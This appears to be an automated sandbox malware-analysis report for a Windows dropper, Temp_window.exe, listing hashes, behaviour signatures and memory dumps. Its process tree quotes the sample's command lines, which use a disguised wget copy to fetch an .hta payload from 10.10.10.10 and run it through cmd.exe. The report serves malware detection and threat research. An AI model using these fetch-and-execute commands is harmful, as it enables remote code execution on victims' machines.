ab4e579283b5eb3cf9f3deef491e7a44aa91adfdc68ab509605002b769662290

Analysis

max time kernel
145s
max time network
148s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
27-05-2023 05:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Temp_window.exe
Size

5.0MB
MD5

b71c658aacf6d01b1b68fc9d7cb4287e
SHA1

58ee38c7ab9d8e37e17d98892cb1953b99648ff8
SHA256

ab4e579283b5eb3cf9f3deef491e7a44aa91adfdc68ab509605002b769662290
SHA512

1bb719835a8a91541ad572f432365449c177c8f41c48c059074d9484b70862699e616eb4aab7910e33bc91b9b5477f07028e1b46bc6096fe6432f072caf1d996
SSDEEP

98304:4Ax56cJP4TUnrDFEZ6uCmoBvYWxvHyh4kokhG83GS89+gPu0LC8YdK:5x56c14TkDFEZ6uCmoBvYWxvLkhV3h8n

Score

7^/10

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
1744	Temp_window.exe

Executes dropped EXE 6 IoCs

pid	Process
2016	winhe1p.exe
1948	winhe1p.exe
524	winhe1p.exe
576	winhe1p.exe
860	winhe1p.exe
1716	winhe1p.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Temp:window.txt	Temp_window.exe
File created	C:\windows\winhe1p.exe	Temp_window.exe
File created	C:\Windows\winpool.sys	Temp_window.exe
File opened for modification	C:\Windows\winpool.sys	Temp_window.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Windows\Temp:window.txt	Temp_window.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1744	Temp_window.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 1744 wrote to memory of 848	1744	Temp_window.exe	28
PID 1744 wrote to memory of 848	1744	Temp_window.exe	28
PID 1744 wrote to memory of 848	1744	Temp_window.exe	28
PID 1744 wrote to memory of 848	1744	Temp_window.exe	28
PID 848 wrote to memory of 2016	848	cmd.exe	30
PID 848 wrote to memory of 2016	848	cmd.exe	30
PID 848 wrote to memory of 2016	848	cmd.exe	30
PID 848 wrote to memory of 2016	848	cmd.exe	30
PID 2016 wrote to memory of 1948	2016	winhe1p.exe	31
PID 2016 wrote to memory of 1948	2016	winhe1p.exe	31
PID 2016 wrote to memory of 1948	2016	winhe1p.exe	31
PID 2016 wrote to memory of 1948	2016	winhe1p.exe	31
PID 1744 wrote to memory of 588	1744	Temp_window.exe	32
PID 1744 wrote to memory of 588	1744	Temp_window.exe	32
PID 1744 wrote to memory of 588	1744	Temp_window.exe	32
PID 1744 wrote to memory of 588	1744	Temp_window.exe	32
PID 1744 wrote to memory of 928	1744	Temp_window.exe	34
PID 1744 wrote to memory of 928	1744	Temp_window.exe	34
PID 1744 wrote to memory of 928	1744	Temp_window.exe	34
PID 1744 wrote to memory of 928	1744	Temp_window.exe	34
PID 928 wrote to memory of 524	928	cmd.exe	36
PID 928 wrote to memory of 524	928	cmd.exe	36
PID 928 wrote to memory of 524	928	cmd.exe	36
PID 928 wrote to memory of 524	928	cmd.exe	36
PID 524 wrote to memory of 576	524	winhe1p.exe	37
PID 524 wrote to memory of 576	524	winhe1p.exe	37
PID 524 wrote to memory of 576	524	winhe1p.exe	37
PID 524 wrote to memory of 576	524	winhe1p.exe	37
PID 1744 wrote to memory of 1308	1744	Temp_window.exe	38
PID 1744 wrote to memory of 1308	1744	Temp_window.exe	38
PID 1744 wrote to memory of 1308	1744	Temp_window.exe	38
PID 1744 wrote to memory of 1308	1744	Temp_window.exe	38
PID 1308 wrote to memory of 860	1308	cmd.exe	40
PID 1308 wrote to memory of 860	1308	cmd.exe	40
PID 1308 wrote to memory of 860	1308	cmd.exe	40
PID 1308 wrote to memory of 860	1308	cmd.exe	40
PID 860 wrote to memory of 1716	860	winhe1p.exe	41
PID 860 wrote to memory of 1716	860	winhe1p.exe	41
PID 860 wrote to memory of 1716	860	winhe1p.exe	41
PID 860 wrote to memory of 1716	860	winhe1p.exe	41

C:\Users\Admin\AppData\Local\Temp\Temp_window.exe
"C:\Users\Admin\AppData\Local\Temp\Temp_window.exe"
1⤵
- Deletes itself
- Drops file in Windows directory
- NTFS ADS
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:1744
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c winhe1p -b -q --limit-rate=300k -O C:/bookss.hta http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/123.hta
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:848
- - C:\Windows\winhe1p.exe
    winhe1p -b -q --limit-rate=300k -O C:/bookss.hta http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/123.hta
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2016
  - - C:\Windows\winhe1p.exe
      winhe1p -b -q --limit-rate=300k -O C:/bookss.hta http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/123.hta
      4⤵
      Executes dropped EXE
      PID:1948
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\\bookss.hta
  2⤵
  PID:588
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c winhe1p -b -q --limit-rate=300k -O C:/book http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/456
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:928
- - C:\Windows\winhe1p.exe
    winhe1p -b -q --limit-rate=300k -O C:/book http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/456
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:524
  - - C:\Windows\winhe1p.exe
      winhe1p -b -q --limit-rate=300k -O C:/book http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/456
      4⤵
      Executes dropped EXE
      PID:576
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c winhe1p -b -q --limit-rate=300k -O C:/bookss.hta http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/123.hta
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1308
- - C:\Windows\winhe1p.exe
    winhe1p -b -q --limit-rate=300k -O C:/bookss.hta http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/123.hta
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:860
  - - C:\Windows\winhe1p.exe
      winhe1p -b -q --limit-rate=300k -O C:/bookss.hta http://10.10.10.10/WzfFX9gBcrsbYkM6NnPFJmZTtA3wzmcnXY7tZhNt/-1/7384/ef03e8d4/123.hta
      4⤵
      Executes dropped EXE
      PID:1716

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
C:\Windows\winhe1p.exe

Filesize
4.8MB

MD5
a6c81b1cb030b42e3dd72531734c1334

SHA1
0086f2db77ec34128806341026495d39ccf998c7

SHA256
e83a75eb44fe7495edf4f9c352f7f5e8360537353770a6e7f6029bf7b6b9a5f7

SHA512
636ff0cb7d6cb719300ed42e48db22c547099b2152e3b34ddcc9319ed20d60e11a2fbc2a66fbd4c2a7842c9b3cd889a30635db61669edd5c0fbf339ab6a4b5e9

Download Submit
memory/524-66-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/576-102-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/576-78-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/576-90-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/576-93-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/576-84-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/576-108-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/576-68-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/576-99-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/860-71-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1716-75-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1716-97-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1716-82-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1716-103-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1716-106-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1716-88-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1744-76-0x0000000000FF0000-0x0000000001015000-memory.dmp

Filesize
148KB

Download
memory/1744-54-0x0000000000FE0000-0x0000000000FF0000-memory.dmp

Filesize
64KB

Download
memory/1744-72-0x0000000000FF0000-0x0000000001015000-memory.dmp

Filesize
148KB

Download
memory/1948-89-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1948-86-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1948-95-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1948-80-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1948-98-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1948-73-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1948-104-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/1948-65-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download
memory/2016-62-0x00000000011C0000-0x00000000016A7000-memory.dmp

Filesize
4.9MB

Download